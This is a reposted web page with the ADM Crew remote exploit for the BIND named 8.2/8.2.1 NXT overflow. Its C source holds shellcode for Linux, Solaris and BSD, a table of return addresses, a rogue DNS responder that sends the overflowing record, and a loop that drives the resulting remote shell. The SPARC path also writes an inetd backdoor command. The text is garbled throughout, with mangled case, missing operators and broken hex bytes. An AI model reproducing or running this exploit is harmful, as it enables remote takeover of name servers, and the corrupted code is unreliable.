Bind NXT remote overflow vulnerability attack code

zhaozj2021-02-16  85

/ ** ADM CONFIDENTIAL -. (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew 1999 * All Rights Reserved ** This module may not be used, . published, distributed or archived without * the written permission of the ADM Crew Please contact your local sales * representative ** ADM named 8.2 / 8.2.1 NXT remote overflow -. horizon / plaguez ** "a misanthropic anthropoid with nothing to say" ** thanks to stran9er for sdnsofw.c ** Intel exploitation is pretty straightforward .. should give you a remote * shell. The shellcode will break chroot, do a getpeername on all open * sockets, and dup to the first one that returns AFINET IT Also Forks and * Runs a Command In Case The Fd Duping Doesn't Go Well. Solaris / Sparc Is A * Bit More Complicated .. WE Are Going Throgh A Well Trodden Part of The * Code, So We don't get The Context Switch We Need To Have It Populate The Stack. However, if You Ju st hammer the service * with requests, you will quickly get a context switch at the right time. * Thus, the SPARC shellcode currently only breaks chroot, closes current * fd's and runs a command. * Also, the NetBSD shellcode does not break chroot because they stop the * dir tricks. Of course, they allow mknods in chrooted environments, so * if named is running as root, then it still might be expoitable. * The non-exec stack patch version returns into a malloc'ed buffer , Whose * Address CAN VARY Alot. Thus, IT May Not Be As Reliable As The Other * Versions.... ** We Broke this Just A Little in Order To Raise The Bar On Using It * (Just Slightly) .. if you '

D Like to Test It on Your Own Box, Put A Shell * In / ADM / SH, OR / ADM / KSH for Solaris on The Target Machine. * / # include #include #include #include #include #include #include #include #include #include #include #include #include

Char Linuxcode [] =

{0xE9, 0xAc, 0x1, 0x0, 0x0, 0x5e, 0x89, 0x76, 0x7, 0x89, 0x46, 0x10, 0x89, 0x46, 0x2e, 0x89, 0x46, 0x14, 0x56, 0xeb, 0x54, 0x5e 0x89, 0x0, 0x0, 0x0, 0xBa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x5, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x50, 0x8d, 0x5e, 0x2, 0xb9, 0xff 0x1, 0x0, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x5e, 0x2, 0x, 0x0, 0x, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5b, 0x53, 0xB8, 0x85, 0x0 0x0, 0x0, 0xcd, 0x80, 0x5b, 0xB8, 0x6, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x5e, 0x, 0x0, 0xc, 0x0,0x0,0x0,0xcd, 0x80, 0x89, 0xf3, 0xb8 0x3D, 0x0, 0x0, 0x0, 0x2c, 0x80, 0xa7, 0xFF, 0xFF, 0xFF, 0x2e, 0x0, 0x41, 0x44, 0x4d, 0x52, 0x4f, 0x43, 0x4b, 0x53, 0x0, 0x2e , 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e 0x2F, 0x0, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x89, 0xc0, 0x85, 0xc0, 0x0, 0x85, 0x8E, 0x0, 0x0, 0x0, 0x89, 0xF3, 0x8d, 0x4e, 0xc 0x8d, 0x56, 0x18, 0x0, 0x0, 0xcd, 0x80, 0x0, 0x1, 0x0, 0x0, 0x0, 0x75, 0x0, 0x0, 0x0, 0x10, 0x0, 0x0 0x0, 0x0, 0x0, 0x0, 0x0, 0x74, 0x68, 0x69, 0x73, 0x6 9, 0x73, 0x73, 0x6f, 0x6d, 0x65, 0x74, 0x65, 0x70, 0x61, 0x63, 0x65, 0X66, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X73, 0X6F, 0X63, 0X6B, 0x69, 0x69, 0x61, 0x64, 0x64, 0x72, 0x69, 0x61, 0x68, 0X79, 0X65, 0X61, 0X68, 0X69, 0X6B, 0X6E, 0X6F, 0X77, 0X74, 0X68, 0X69, 0X73, 0x69, 0x73, 0x6c, 0x61, 0x6d, 0x65, 0x62, 0x75, 0x74, 0x61, 0x61, 0x79, 0x77, 0x68, 0x6F, 0X63, 0X61, 0X72, 0X65, 0X73, 0X68, 0X6F, 0x72, 0x69, 0x7a, 0x6f, 0x6e, 0x67, 0x6f, 0x74, 0x69, 0x74, 0x77, 0x6f, 0x72, 0x6b, 0x69, 0x6f, 0x67, 0x73, 0x6f, 0x61, 0x6c, 0x6c, 0x69, 0x73, 0x63, 0x6f, 0x6f, 0x6c, 0x56, 0x86, 0x46, 0x8, 0x50, 0x8b, 0x46, 0x4, 0x50, 0xff, 0x46, 0x4, 0x89, 0xe1, 0xbb, 0x7, 0x0, 0x0, 0x0, 0xB8, 0X66, 0x0, 0x0, 0x0, 0XCD, 0x80, 0X83, 0XC4, 0X80, 0X89, 0XC0, 0X85, 0X, 0X2, 0X75, 0X7E, 0X8, 0X2, 0X75, 0X3, 0X8B,

0x56, 0x4, 0x4a, 0x52, 0x89, 0x3, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5a, 0x52, 0x89, 0x0, 0xB9, 0X1, 0x0, 0x0, 0x0, 0xB8, 0X3F, 0x0, 0x0, 0x0, 0x0, 0x89, 0x3, 0xB9, 0X2, 0x0, 0x0, 0x0, 0X0, 0X3F, 0x0, 0x0, 0x0, 0XCD, 0X80, 0x46, 0x46, 0X46, 0X46, 0X46, 0X46, 0X46, 0X10, 0x0, 0x0, 0x0, 0x0, 0xE9, 0XFE, 0XFE, 0xFF, 0xFF, 0xE8, 0XE9, 0xFF, 0xFF, 0xFF, 0xE8, 0X4F, 0xFE, 0xFF, 0x0x, 0x2F, 0x61, 0x64, 0X68, 0x2F, 0x73, 0x68, 0x0, 0x2D, ​​0x63, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x31, 0x30, 0x2f, 0x39, 0x39, 0x2D};

Char sc [] = {0x40, 0x0, 0x0, 0x2e, 0x1, 0x0, 0x0, 0x0, 0x90, 0x3, 0x10, 0x20, 0x0, 0x82, 0x10, 0x20, 0x5, 0x91, 0x0, 0x20, 0x0, 0xA0, 0x10, 0x0, 0x8, 0X90, 0X3, 0X10, 0X21, 0x92, 0X10, 0X21, 0X20, 0X80, 0X91, 0X20, 0X20, 0X0, 0X90, 0X3, 0XE0, 0xcc, 0x82, 0x10, 0x20, 0x3d, 0x91, 0x0,0x20,0 x0, 0x90,0 x 10 x 10 x0, 0x78, 0x91, 0x2, 0x20, 0x0, 0x90, 0x10, 0x0, 0x10, 0x82, 0x10, 0x20, 0x6, 0x91, 0x2, 0x20, 0x0, 0x90, 0x3, 0x10, 0x20, 0xc, 0x91, 0x2, 0x20, 0x0, 0x90, 0x3, 0x0, 0x2, 0x82, 0x10, 0x20, 0x0, 0x0, 0xA0, 0x10, 0x20, 0x0, 0x90, 0x10, 0x0, 0x10, 0x82, 0x10, 0x20, 0x6, 0x91, 0x0, 0x20, 0x0, 0xa0, 0x4, 0x20, 0x1, 0x80, 0xA4, 0x20, 0x1e, 0x4, 0x/0, 0x0, 0x0, 0x90, 0x3, 0xE0, 0XC0, 0XA0, 0X3, 0XE0, 0XC5, 0XE0, 0X23, 0XBF, 0xF0, 0xA0, 0x3, 0xE0, 0XC9, 0XE0, 0X23, 0X3, 0X23, 0X5, 0X3, 0X23, 0X5, 0XF8, 0XC0, 0X23, 0XBF, 0xFC, 0x92, 0X3, 0XBF, 0xF0, 0x94, 0x3, 0x10, 0x20, 0x3b, 0x91,0x2,0x20,0 x0, 0x81,0xc3,0x0,0x8, 0x1,0x0,0 x0, 0 x0, 0x2f, 0x61, 0x64, 0x6d, 0x2f, 0x6b, 0x73, 0x68, 0x0, 0x2d, 0x63, 0 X0, 0X41, 0X44, 0X4D, 0x52, 0X4F, 0x43, 0X4B, 0x53, 0x0, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x68, 0x6f, 0x72, 0x69, 0x7a, 0x6f, 0x6e, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x31, 0x30, 0x2f, 0x39, 0x39, 0x0}; char bsdcode [] =

{0xE9, 0X0, 0X5E, 0X31, 0XC0, 0X50, 0X50, 0X50, 0X17, 0X50, 0X50, 0X56, 0X50, 0X50, 0X5, 0X50, 0X80, 0X89 0x46, 0x28, 0x0, 0x0, 0x51, 0x8d, 0x46, 0x2, 0x50, 0x50, 0xB8, 0x88, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x46, 0x2, 0x50, 0x50 0xB8, 0X3D, 0x0, 0x0, 0X8B, 0X46, 0X28, 0X50, 0X50, 0X2, 0XA7, 0x0, 0x0, 0x0, 0X34, 0XAA, 0XCD, 0X80, 0X8D, 0X46, 0X, 0X50 0x50, 0x0, 0xA6, 0x0, 0xAa, 0xcd, 0x80, 0x8d, 0x46, 0x21, 0x48, 0x50, 0x50, 0x, 0x3d, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x50, 0xb8 0x2, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x85, 0xc0, 0x0, 0x85, 0xE6, 0x0, 0x0, 0x38, 0x89, 0x56, 0x28, 0x8d, 0x46, 0x40, 0x89, 0x46 , 0x2c, 0x8d, 0x46, 0x43, 0x89, 0x46, 0x30, 0x8d, 0x46, 0x30, 0x50, 0x, 0x46, 0x28, 0x50, 0x52, 0x50, 0x0, 0x0, 0xcd, 0x80, 0x50 0x50, 0x0, 0x0, 0xcd, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x62, 0x6c, 0x61, 0x68 0x62, 0x6c, 0x61, 0x68, 0x73, 0x61, 0x6d, 0x69, 0x74, 0x68, 0x69, 0x6e, 0x67, 0x79, 0x65, 0x74, 0x61, 0x68, 0x6F, 0X74, 0X68, 0X65, 0X72, 0X73, 0X70 0x61, 0x63, 0x65, 0x66, 0x6f, 0x72, 0x61, 0x73, 0x6F, 0x63, 0X64, 0X72, 0X73, 0X74, 0X72, 0X75, 0X63, 0X74, 0X75, 0X72, 0X65, 0X62, 0X75, 0X74, 0X74, 0X68, 0X69, 0x73, 0x74, 0x69, 0X6D, 0x65, 0x66, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X73, 0X68, 0X65, 0X6C, 0X6C, 0X63, 0X6F, 0X64, 0X65, 0X66, 0X6F, 0x72, 0x74, 0x75, 0x6e, 0x61, 0x74, 0x6c, 0x79, 0x74, 0x68, 0x69, 0x73, 0x77, 0x69, 0x6c, 0x6c, 0x6b, 0x69, 0x68, 0x6f, 0x70, 0x65, 0x6f, 0x6b, 0x69, 0x74, 0x68, 0x69, 0x6e, 0x6b, 0x65, 0x67, 0x68, 0x73, 0x70, 0x61, 0x63, 0x65, 0x6e, 0x6f, 0x77, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x20, 0x42, 0x53, 0x44, 0x20, 0X63, 0X72, 0X61, 0X70, 0X70, 0X79, 0X20, 0X73, 0X68, 0X65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x20, 0x2d, 0x20, 0x31, 0x30, 0x2f, 0x39, 0 x 39, 0x31, 0xD2, 0xE9, 0x3F, 0xFF, 0xFF, 0xFF,

0x8d, 0x46, 0x4, 0x50, 0x8d, 0x46,0x8,0x50,0x1f, 0x0,0x0,0 x0 xcd, 0x80, 0x5a, 0x83, 0xf8, 0x0,0x75,0x6,0x80,0x7e, 0x9, 0x2, 0x74, 0xc, 0x52, 0x52, 0x/0, 0x6, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x42, 0x, 0x0 x 5 x 6a, 0x0, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0, 0xCD, 0x80, 0x6a, 0x1, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0,0x2,0x52,0 x 52, 0 x2, 0x5a, 0x0,0 x0, 0 x0, 0xcd, 0x80, 0xeb, 0x29, 0x5e, 0x46, 0x46, 0x46, 0X46, 0X46, 0X8D, 0X56, 0X38, 0X89, 0X56, 0X28, 0X0, 0X46, 0X2C, 0x0, 0x0, 0x0, 0x0, 0x8d, 0x46, 0x34, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52, 0x52, 0xB8, 0X3B, 0x0, 0x0, 0x0, 0xcd, 0x80, 0xe9, 0xc1, 0xFe, 0xFF, 0xFF, 0XE8, 0X2, 0xFF, 0xFF, 0xFF, 0xE8, 0X27, 0XFE, 0xff, 0xff, 0x2e, 0x0,0x41,0x44,0x4d, 0x52, 0x4f, 0x43, 0x4b, 0x53, 0x0,0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x0, 0x2e, 0x2f, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x2f, 0x61, 0x64, 0x6d, 0x2f, 0x73, 0x68, 0x0, 0x2d, 0x63, 0x75, 0x63, 0x68, 0x20, 0x2f, 0x74, 0x6d, 0x7 0, 0x2f, 0x59, 0x4f, 0x59, 0x4f, 0x59, 0x4f, 0x0}; char bsdnochroot [] =

{0xE9, 0X79, 0X1, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x85, 0xc0, 0x10, 0x85, 0xe6, 0x0, 0x0, 0x0, 0x8d, 0x56, 0x38 0x89, 0x56, 0x28, 0x8d, 0x46, 0x40, 0x89, 0x46, 0x43, 0x89, 0x46, 0x30, 0x8d, 0x46, 0x30, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52,0x50 0xB8, 0x3B, 0x0, 0x0, 0X50, 0X50, 0X80, 0x1, 0x0, 0x0, 0x0, 0xCD, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 0xFF, 0x0, 0x6c, 0x61, 0x68, 0x62, 0x6c, 0x61, 0x68, 0x73, 0x61, 0x68, 0x65, 0X74, 0X68, 0X69, 0X6E, 0X67, 0X79, 0X65, 0X74, 0X61 0x6e, 0x6f, 0x74, 0x68, 0x70, 0x61, 0x63, 0x65, 0x66, 0x6f, 0x72, 0x61, 0x73, 0x6f, 0x63, 0x6b, 0x61, 0x64, 0x64, 0x72, 0x73, 0x74 , 0x72, 0x75, 0x72, 0x65, 0x62, 0x75, 0X74, 0X74, 0X68, 0X69, 0X73, 0X74, 0X69, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X62 0x73, 0x64, 0x73, 0x68, 0x65, 0X6F, 0X64, 0X65, 0X66, 0X6F, 0X72, 0X74, 0X75, 0X6E, 0X61, 0X74, 0X6C, 0X79, 0X74, 0X68, 0X69, 0X73 0x77, 0x69, 0x6c, 0x6c, 0x77, 0x6f, 0x72, 0x6b, 0x69, 0x68, 0x6f, 0x70, 0x65, 0x6f, 0x6b, 0x69, 0x6e, 0x6b, 0x65, 0x6e, 0x6f, 0x75 0x 67, 0x68, 0x73, 0x70, 0x61, 0x63, 0x65, 0x6e, 0x6f, 0x77, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x20, 0x42, 0x53, 0X44, 0X20, 0X63, 0X70, 0X79, 0X20, 0X73, 0X68, 0X65, 0X6C, 0x6C, 0X63, 0X6F, 0X64, 0X65, 0X20, 0X2D, 0X20, 0X31, 0X30, 0X2F, 0x39, 0x39, 0x31, 0xD2, 0xE9, 0x3F, 0xFF, 0xFF, 0xFF, 0x5E, 0x8D, 0x46, 0X4, 0X50, 0X8D, 0X46, 0X8, 0X50, 0X52, 0X52, 0XB8, 0X1F, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5a, 0x83, 0x0,0x0,0x7e, 0x9,0x2,0 x74, 0xc, 0x52,0 x 52, 0 x0, 0x6, 0x0, 0x0, 0 x0, 0xcd, 0x80, 0x42, 0xeb, 0xD7, 0x6a, 0x0, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0, 0x1, 0x52, 0x52, 0x1, 0x5a, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x6a, 0x2, 0x52, 0x52, 0x0, 0x5A, 0x0, 0x0, 0x0, 0x29, 0x5E, 0X46, 0X46, 0X46, 0X46, 0X46, 0X8D, 0X56, 0X38, 0X89, 0X56, 0X28, 0XC7, 0X46, 0x2c, 0x0,

0x0, 0x0, 0x0, 0x8d, 0x46, 0x34, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52, 0x52, 0x0, 0x0, 0xcd, 0x80, 0xe9, 0xc0, 0xFe, 0xFF, 0xFF, 0xE8, 0xD2, 0xFF, 0xFF, 0xFF, 0xE8, 0X82, 0XFE, 0xFF, 0xFF, 0X2E, 0X0, 0X41, 0X44, 0X4D, 0X52, 0X4F, 0X43, 0X4B, 0X53, 0x0, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x0, 0x2e, 0x2f, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x2F, 0x61, 0x64, 0X68, 0x2F, 0X73, 0X68, 0x0, 0x2D, 0x63, 0x0, 0x74, 0x6F, 0X75, 0X2F, 0X74, 0X6D, 0x70, 0x2F, 0X59, 0X4F, 0X59, 0X4F, 0X59, 0X4F, 0x0}; struct arch {Int id; char * name CHAR * CODE; INT CODESIZE; UNSIGNED Long Ret; INT Length;

Struct Arch Archlist [] = {{1, "Linux Redhat 6.x - Named 8.2 / 8.2.1 (from rpm)", Linuxcode, SizeOf (Linuxcode), 0, 0xBFFD6C3, 6500}, {2, "Linux Solardiz's Non -EXEC Stack Patch - Named 8.2 / 8.2.1 ", Linuxcode, SizeOf (Linuxcode), 0, 0x80f79ae, 6500}, {3," Solaris 7 (0xFF) - Named 8.2.1 ", SC, SIZEOF (SC), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - Named 8.2.1", SC, SIZEOF (SC), 0xEFFFA000, 0xEffe5D0, 11000}, {5, "FreeBSD 3.2-Release - Named 8.2", BSDCode, Sizeof (BSDCODE), 1, 0XBFBFBDB8, 7000}, {6, "OpenBSD 2.5 - Named 8.2", BSDCode, Sizeof (BSDCode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - Named 8.2.1" Bsdnochroot, Sizeof (BSDnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0}};

INT Arch = 0; char * command = 0;

/ * THESE TWO DNS ROUTINES from DSPOOF / JIZZ * /

/ * Pull Out a commitsed query name * / char * DNSSPrintFlabel (Char * S, Char * BUF, CHAR * P) {UNSIGNED SHORT I, LEN; Char * B = NULL; LEN = (unsigned short) * (p ); While (LEN) {While (LEN> = 0xc0) {if (! b) b = p 1; p = buf (NTOHS (* ((unsigned short *))) & ~ 0xc000); LEN = (unsigned short) * (p );

For (i = 0; i

* (S ) = '.';

Len = (unsigned short) * (p );}

* (S ) = 0; if (b) return (b);

Return (P);

/ * Store a Query Name * / char * DNSADDLABEL (Char * P, Char * Label) {char * p1;

While (* label) && (label)) {IF ((* Label == '.') && (! * (label 1))) Break;

P1 = strchr (label, '.');

IF (! p1) p1 = strchr (label, 0);

* (p ) = p1-label; Memcpy (p, label, p1-label); p = p1-label;

Label = p1; if (* p1) label ;} * (p ) = 0;

Return (P);

Void make_overflow (char * a) {INT i; unsigned long * b; unsigned char * c; char sbuf [4096];

IF (Archlist [Arch] .safe == 0) / * Linux * / {MEMSET (A, 0x90, 4134); Memcpy (A 3500, Archlist [Arch] .code, Archlist [Arch] .codesize;

IF (Command) STRCPY (A 3500 Archlist [Arch] .codesize, command); Else Strcpy (A 3500 Archlist [Arch] .codesize, "exit");

B = (unsigned long *) (A 4134); for (i = 0; i <20; i ) * b = Archlist [Arch] .ret;} else if (Archlist [Arch] .safe == 1) / * BSD * / {MEMSET (A, 0x90, 4134); Memcpy (A 3300, Archlist [Arch] .code, Archlist [Arch] .codesize);

IF (Command) STRCPY (A 3300 Archlist [Arch] .codesize, command); Else Strcpy (A 3300 Archlist [Arch] .codesize, "exit"); b = (unsigned long *) (A 4134 ); For (i = 0; i <20; i ) * b = Archlist [Arch] .ret;} else / * sparc * / {MEMSET (A, 0x0, 11000);

B = (unsigned long *) (A 4438);

For (i = 0; i <1500; i ) * b = HTONL (0xac15a16e);

C = (char *) b; for (i = 0; I > / TMP / BOB; / USR / SBIN / INETD -S / TMP / BOB; / BIN / RM -F / TMP / BOB ");

B = (unsigned long *) (A 4166);

* B = HTONL (0xDeadbeef); * b = HTONL (0xdeADBeef); * b = HTONL (Archlist [Arch] .safe); // I2 - Significant * B = HTONL (0xdeADBeef); * B = HTONL (0xdeAdbeef); * B = HTONL (Archlist [Arch] .safe); // i5 - signitive * b = htonl (0xdeadbeef); * b = HTONL (0xdeADBeef);

* B = HTONL (Archlist [Arch] .safe); // O0 - Signitiveant * B = HTONL (0xdeADBeef); * B = HTONL (Archlist [Arch] .safe); // O2 - Significant * B = HTONL (0xdeADBeef ); * B = htonl (0xdeadbeef); * b = htonl (0xdeadbeef); * b = HTONL (Archlist [Arch] .safe); // O6 - Significant * B = HTONL (Archlist [Arch] .ret); / / o7 - retarddr}}

INT form_response (header * packet, char * buf) {char query [512]; int qtype; header * DNSH; char * p; char * walker;

MEMSET (BUF, 0, SIZEOF (BUF)); DNSH = (Header *) BUF; DNSH-> ID = Packet-> ID; DNSH-> QR = 1; DNSH-> AA = 1; DNSH-> qdcount = Htons (1); DNSH-> Ancount = htons (1); DNSH-> arcount = htons (1); DNSH-> rcode = 0;

Walker = (char *) (DNSH 1);

P = DNSSPRINTFLABEL (Query, (char *) packet, (packet 1)); Query [Strlen (Query) - 1] = 0;

Qtype = * ((unsigned short *) p);

Printf ("% s type =% d / n", query, ntohs (qtype));

/ * first, the query * /

Walker = DNSADDLABEL (Walker, Query); Putshort (NTOHS (QTYPE), Walker; // Putshort (htons (t_ptr), Walker; Putshort (1, Walker);

/ * THEN, OUR Answer * / / * query in a 1.2.3.4 * /

Walker = DNSADLABEL (Walker, Query); Putshort (T_A, Walker); Putshort (1, Walker); PUTLONG (60 * 5, Walker); Putshort (4, Walker); Sprintf (Walker, "% C% C% C) % C ", 1, 2, 3, 4); Walker = 4;

/ * Finally, we make named do something more interesting * /

Walker = DNSADDLABEL (Walker, Query); Putshort (T_NXT, Walker); Putshort (1, Walker); PUTLONG (60 * 5, Walker);

/ * The Length of One Label And Our Arbitrary Data * /

Putshort (Archlist [Arch] .length 7, Walker);

Putshort (6, Walker); Sprintf (Walker, "AdmAdm"); Walker = 6; Putshort (0, Walker);

Make_overflow (Walker); Walker = Archlist [Arch] .length; Putshort (0, Walker); Return Walker-buf;}

#define max (x, y) ((x)> (x): (y))

INT proxyloop (int S) {char SND [1024], RCV [1024]; FD_SET RSET; INT MAXFD, N;

Sleep (1); Printf ("Entering proxyloop ../ n"); strcpy (SND, "CD /; Uname -A; PWD; ID; / N"); WRITE (S, SND, STRLEN (SND));

FOR (;;) {fd_set (FDINO (STDIN), & RSET); FD_SET (S, & RSET); MAXFD = Max (Fileno (stdin), s) 1; SELECT (Maxfd, & RSET, NULL, NULL, NULL); IF (FD_ISSET (Fileno (stdin), & rset) {Bzero (SND, SIZEOF (SND)); FGETS (SND, SIZEOF (SND) - 2, STDIN); Write (S, SND, STRLEN (SND));} IF (fd_isset (s, & rset)) {Bzero (RCV, SIZEOF (RCV)); IF ((n = read (s, rcv, sizeof (rcv))) == 0) exit (0); if (n < 0) {RETURN-3;} fputs (rcv, stdout);}} Return 0;} int main (int Argc, char ** argv) {Int S, Fromlen, RES, SL, S2; Struct Sockaddr_in SA, FROM, TO; char buf [16384]; unsigned short ts; int i;

IF (Argc <2) {fprintf (stderr, "usage:% s architecture [command] / n", argv [0]); fprintf (stderr, "available architectures: / n"); i = -1; while (While Archlist [ i] .id) FPrintf (stderr, "% d:% s / n", archlist [i] .id, archlist [i] .name); exit (1);

Arch = ATOI (Argv [1]) - 1;

IF (argc == 3) Command = argv [2];

IF ((S = Socket, Sock_DGRAM, IPPROTO_UDP)) == - 1) {PERROR ("socket"); exit (1);}

Bzero (& SA, SIZEOF SA);

sa.sin_family = af_inet; sa.sin_addr.s_addr = inaddr_any; sa.sin_port = HTONS (53);

IF (Bind (S. (Struct SockAddr *) & Sa, SizeOf (SA)) == - 1) {PERROR ("Bind"); exit (1);}

Do {fromlen = sizeof (from); if ((res = recvfrom (s, buf, sizeof buf, 0, (struct socddr *) & from, & fromlease) == -1) {PERROR ("Recvfrom"); EXIT 1); }

Printf ("Received Request FROM% S:% D for", INET_NTOA (from_ADDR), NTOHS (from.sin_port)); SL ​​= Form_Response ((Header *) BUF, Sendbuf);

/ * Now Lets Connect to the Nameserver * /

Bzero (& To, SIZEOF (to)); to.sin_Family = AF_INET; TO.SIN_ADDR = from.sin_addr; to.sin_port = HTONS (53);

IF ((S2 = Socket (AF_INET, SOCK_STREAM, 0)) == - 1) {PERROR ("socket"); exit (1);}

IF (Connect (S2, (Struct SockAddr *) & to, SizeOf to) == - 1) {Perror ("Connect"); exit (1);}

Ts = HTONS (SL); Write (S2, & TS, 2);

Write (S2, Sendbuf, SL); IF (Archlist [Arch] .safe> 1) Close (S2);} while (archlist [Arch] .safe> 1); / * Infinite loop for sparc * / proxyloop (S2) EXIT (1);

转载请注明原文地址:https://www.9cbs.com/read-15230.html

New Post(0)